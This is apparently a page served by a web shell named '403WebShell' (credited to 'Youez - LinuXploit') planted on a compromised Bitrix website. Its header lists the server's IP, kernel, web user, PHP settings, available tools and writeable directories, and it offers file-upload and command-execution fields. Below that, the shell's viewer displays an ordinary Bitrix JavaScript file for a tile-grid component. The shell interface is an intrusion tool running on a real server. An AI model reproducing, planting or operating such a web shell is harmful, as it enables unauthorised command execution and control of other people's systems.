%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.221.18.145
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/rest.configuration.section/templates/.default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/rest.configuration.section/templates/.default//script.js
;(function () {
	'use strict';

	BX.namespace('BX.Rest.MarketDirections.TileGrid.Item');

	if (!BX.TileGrid)
	{
		return false;
	}
	/**
	 *
	 * @param options
	 * @extends {BX.TileGrid.Item}
	 * @constructor
	 */

	BX.Rest.MarketDirections.TileGrid.Item = function (options) {

		BX.TileGrid.Item.apply(this, arguments);

		this.title = options.title;
		this.description = options.description;
		this.icon = options.icon;
		this.color = options.color;
		this.link = options.link;

		this.layout = {
			wrapper: null,
			title: null,
			description: null,
			icon: null
		}

	};

	BX.Rest.MarketDirections.TileGrid.Item.prototype = {

		__proto__: BX.TileGrid.Item.prototype,
		constructor: BX.TileGrid.Item,

		getContent: function () {
			if (!this.layout.wrapper)
			{
				this.layout.wrapper = BX.create('div', {
					props: {
						className: 'rest-market-directions-wrapper',
					},
					children: [
						this.getColorLine(),
						this.getIconNode(),
						BX.create('div', {
							props: {
								className: 'rest-market-directions-content'
							},
							children: [
								this.getTitle(),
								this.getDescription(),
								this.getLinkNode()
							]
						})
					]
				})
			}

			return this.layout.wrapper;
		},

		getLinkNode: function () {
			if (!this.link)
			{
				return
			}

			return BX.create('div', {
				props: {
					className: 'rest-market-directions-link-wrapper'
				},
				children: [
					BX.create('a', {
						props: {
							className: 'rest-market-directions-link',
							href: this.link
						},
						text: BX.message('REST_CONFIGURATION_SECTION_LINK_NAME')
					})
				]
			})
		},

		getIconNode: function () {
			if (!this.layout.icon)
			{
				this.layout.icon = BX.create('div', {
					props: {
						className: 'rest-market-directions-icon'
					},
					children: [
						BX.create('div', {
							props: {
								className: 'rest-market-directions-round'
							},
							style: {
								backgroundColor: this.color
							}
						}),
						this.icon ?
							BX.create('div', {
								props: {
									className: 'rest-market-directions-icon-image'
								},
								style: {
									backgroundImage: 'url(' + this.icon + ')'
								}
							}) : null
					]
				})
			}

			return this.layout.icon;
		},

		getColorLine: function () {
			if (!this.color)
			{
				return
			}

			return BX.create('div', {
				props: {
					className: 'rest-market-directions-color-line'
				},
				style: {
					backgroundColor: this.color
				}
			})
		},

		getTitle: function () {
			if (!this.layout.title)
			{
				this.layout.title = BX.create('div', {
					props: {
						className: 'rest-market-directions-title'
					},
					text: this.title
				})
			}

			return this.layout.title;
		},

		getDescription: function () {
			if (!this.layout.description)
			{
				this.layout.description = BX.create('div', {
					props: {
						className: 'rest-market-directions-description'
					},
					text: this.description
				})
			}

			return this.layout.description;
		},

		clipDescription: function () {
			if (!this.layout.description)
			{
				return;
			}
			BX.cleanNode(this.layout.description);
			var descriptionWrapper = BX.create("span", {
				text: this.description
			});

			this.layout.description.appendChild(descriptionWrapper);

			var nodeHeight = this.layout.description.offsetHeight;
			var text = this.description;

			var a = 0;

			while (nodeHeight <= descriptionWrapper.offsetHeight && text.length > a)
			{
				a = a + 2;
				descriptionWrapper.innerText = text.slice(0, -a) + '...';
			}
		},

		afterRender: function () {
			this.clipDescription()
		}
	};
})();

Youez - 2016 - github.com/yon3zu
LinuXploit